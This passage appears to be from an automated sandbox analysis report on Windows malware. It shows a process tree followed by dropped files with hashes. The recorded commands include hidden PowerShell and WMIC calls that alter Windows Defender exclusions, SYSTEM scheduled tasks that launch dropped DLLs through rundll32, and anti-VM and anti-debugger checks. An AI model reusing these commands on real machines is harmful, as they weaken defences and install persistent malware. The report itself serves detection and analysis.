                                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4696
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:1432
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:2880
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3144
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3504
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2384
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:4412
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:5188
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:1212
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\QFUAWE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:4232
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\iVOtQsr.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:3604
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /END /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3756
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\PXBejtY.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:2384
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\mTplVvq.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:464
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\zDXvLPg.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:3056
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\AngyuSr.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:1864
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 01:21:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\Cswglrdk\ctsLFEb.dll\",#1 /IdidACZu 385134" /V1 /F
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:856
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1176
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 2124
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:4696
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5900 -ip 5900
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5552
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\Cswglrdk\ctsLFEb.dll",#1 /IdidACZu 385134
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5496
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\Cswglrdk\ctsLFEb.dll",#1 /IdidACZu 385134
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2840
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4520 -ip 4520
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5424
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5720 -ip 5720
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\b9695770f1\Dctooux.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:396
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:3140
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                PID:2216

                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                              • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                129B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                              • C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\zDXvLPg.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                47c1dafcd4cdaf496a76c89fc6081f26

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                67fddb849a15666cf3f88df8515aad40ac61f532

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                f105baaf87a0fcb69d6bac746d58983fed019ac3d541b9c98478d59471a2337f

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                dd722b680ed4553583f615f5b909c4bb33121ae76b2b90d97a15de01ff85262ec60731b31d535582ba092d1dca02baff43d4c0254973caab0bbce0a6667e5ff6

                                                                                                                                                                                                                                              • C:\Program Files (x86)\QtKEgKYoTGTqC\AngyuSr.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                4b097eaf14625cbce534244c5c5de075

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6060f3809e4730fdc4fa6e48eaf1c11c1313eb6a

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                37524d1b3ec4710174c049e431e835e72fb762d47e4f4a0e579a58077a29886a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                4f6086ce5096e4060e1858f0fb178f4498dc8102eed44d2e2a3fdd8bc694687c533ab4662f48ed4edbdf943a1af00e4dd28c5ccafff8bf8c9ca0832d28e14c0e

                                                                                                                                                                                                                                              • C:\Program Files (x86)\dlfHiRefefjU2\PXBejtY.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                f1c7952f6b692668022a776843063eb4

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                e5a7a9784a018f24ad8533d97f524086cf64be9e

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c34ad7cc3a35595bfa0f2fd72e3c6d835aaae10c9d8033852322e425751f16f1

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                3776e802b03cc41cdffb067b784f55c7d191b2987afeff21e690fe59e39da48f741d3f92365dbcaaff982f0c51bd213ab280b7b241d72be9650a4722d158036f

                                                                                                                                                                                                                                              • C:\Program Files (x86)\hsUwQAlMU\iVOtQsr.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                7db265b5b78d84607054bf2b8d69aefd

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                c66928414e564cec6242dc32ea786838f1c91f3c

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                d41334d68d0d8720ac76c6fba46be1503fce8bc9ec52d51495de5fc46eeade32

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                37b6c4feb6401ff23cdd6bb8b0ac9cf487da1a9922260030bcad2a544b0194653fd2ec89ecc017f307b54fdfee93d9352723a4895e561214e657a0adb9e821db

                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                fe847ba0633db1aed348aee4ea5c60d0

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                b922db032f66f1a08f9f48a61281fe76b30186d7

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                8dcb586d2c4dfa2a7ed9fa5ce81f02fb609f385577f86f9bac4ca2849bceecc6

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                716ab9417983d911463fbd4ec77e4e9c7758eb5cd6ce60b8724150a001d6b02debbd5cf7158dcd812d26e262c8629f319813452f9571394e6c5a0d0740addeca

                                                                                                                                                                                                                                              • C:\ProgramData\nivjmgppGaMJQQVB\mTplVvq.xml

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                c37ce4426261abc0979aa0381115b49b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9674514ce9c7cebd157747bb141df4e4c40ce35f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                106210a1475648870baf8188bb464a569b4eba417fd171515549eab89b3ca9a5

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                3cb6e37050f462ee90bb73978acf3a34cc9950d8a8bae8792efd133195e6ab1daca2f8979f5ed03602894b6c5c4aaa99cff7c30e7cca6abe7e9055ab1caaabe2

                                                                                                                                                                                                                                              • C:\Users\Admin\1000004002\ee4c8451e8.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                753e81bd74c6678897227c425caea2bf

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9adce0829af8ee24cfaac85d0037c920792c2b4d

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                d312c43f62171936d355b519b9eb7d66d3f79d2c40ad5b27970774cd81c58560

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                ee27b5b938a0489b4c1f3fb97ab86721edb097642c211cf5ca2de9bf03fd8f55f22206be766f36b568488f66d2f1e6fe36add50a17e279863fc7d42f41b69197

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                187B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                150B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                8a567a23b3c59a17394dcdf037abac82

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                68a50e27e4dfdeff329c32667a46ff8b7e4415e3

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                7875cc03e510a9c474187045cb182e88bd84a3778dff6356e25e2024456f765b

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                865a7054fb8245fe1259347637c0b7b6cd6ed7d27750122fba80b865b40afbd3edc98bfac53e1673955a43ec2861701e87a3a52e3ef7d80f9ec565b8105c98a3

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                6556435a8f24d9a6c4268f8be74a1761

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                94d5e8f28c3a7c54bc4ee21e2d9d37a818b31c49

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                dea9e1da2c14c21cb3c7b0103d843e6291fec426da7bff42e9fca48d434abffe

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                bf28bb01cc467d96d1d0ea167be674138ab6325bc57a40024028ebb89b431808baae15ce46f20e8e452fe534285dfde4f2e9a22aa0f4ba4aab6729e96feba657

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dctooux.exe.log

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                411B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                6978c4cc994dfca124c4ba1dd57b67bb

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                22599d27fc4860746b18d18ec3f5b52bcadc7f69

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                4316a207e4de7425aa5d54fb2aba0f01b9d3fa3a4810c300da132be830bc63ad

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                d4393211aa7116431ea2527734a96ed7b2bba6348c3d5eac563dc8b0fb9176e58b3573e0168e136b7f8f28fb54ab8e464d2742171b47568760ce1fec0ccbe55e

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e080d58e6387c9fd87434a502e1a902e

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                ae76ce6a2a39d79226c343cfe4745d48c7c1a91a

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                6fc482e46f6843f31d770708aa936de4cc32fec8141154f325438994380ff425

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                6c112200ef09e724f2b8ab7689a629a09d74db2dcb4dd83157dd048cbe74a7ce5d139188257efc79a137ffebde0e3b61e0e147df789508675fedfd11fcad9ede

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                151B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                15KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                975f8075c966ddf1b8c651c16b1fe668

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                4f52580a70c2a65b998a85fcc956c603543c3d04

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                ccfd2f7340cd8bfe9fc4fbfbca08a0303c587158b3bd48367178f9654dfa648a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                925b0e3d4c974e9a9bd084ed238ffa84759100ff535d79ee75d4e23a14a96425dffe2738777eec979e30fb621c387a9d4cabed7059eb19c3d5e9c5cffe2a23ea

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                11KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3c8d6b2847a714f9e6c7f81209e0bd7b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                78d08bdd731cfbe736bcffb83bffd894d19f31d7

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                4a846d9eddf49d17b7d5f7cce8979bbe306c31f923acb6bd84378eaa8c79f030

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                495d100d779025c590898f324d1c6c009fcc516203d4159292a93d9cd11f0668e20b4245f2d3db762d73de3759150270db8413040c186e90926cd04b5786c448

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000005001\9758585e6f.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.4MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b59c1b10aa67c4a265255370c427efff

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                c03cfccbcebdf58c32d74091ea063abc246d9b18

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                e27ecd71bc024ef922ace1fdec1621acc61cd121d878c9af09c763ee214388f6

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                807dfc47fcadef92fc227f209f4ef78b5a9e7d012364fe90dd076c9266d4e6070e7a1236ad70eee6c93550e68f568cceedd41623b71d2aac3af7f7a3833a4575

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2.2MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                e817cc929fbc651c5bdab9e8cca0d9d9

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                4d73dc2afcde6a1dcf9417c0120252a2d8fd246f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000045001\setup.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                7.2MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                7f5a929a4f2afb5a48d0235cc68637d9

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                a472f8e602a2befca859f7eff845a7b8a16de5c6

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                31ddb8be2897f4797e5245b1caff2d724007795428a4ec6877e2fbd7ab40474c

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0113b16a02b543491298102ab28dcfb02b8e6f551fb6b5af632c09dfd1b95369dcf0c5877270bdbd0e95b6a13f695c70b0eacc96b6b449e6c1520f26ce75fa2e

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000046001\9a3efc.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                671KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                60bebe223ad34cae3a2470e885df02fb

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                43c568865544a951205948329b81a4b18dbe304c

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                fa802d99ddba32cc9122656cb13e4791cc6bc109a51273116f452c76ae02a72d

                                                                                                                                                                                                                                                SHA512

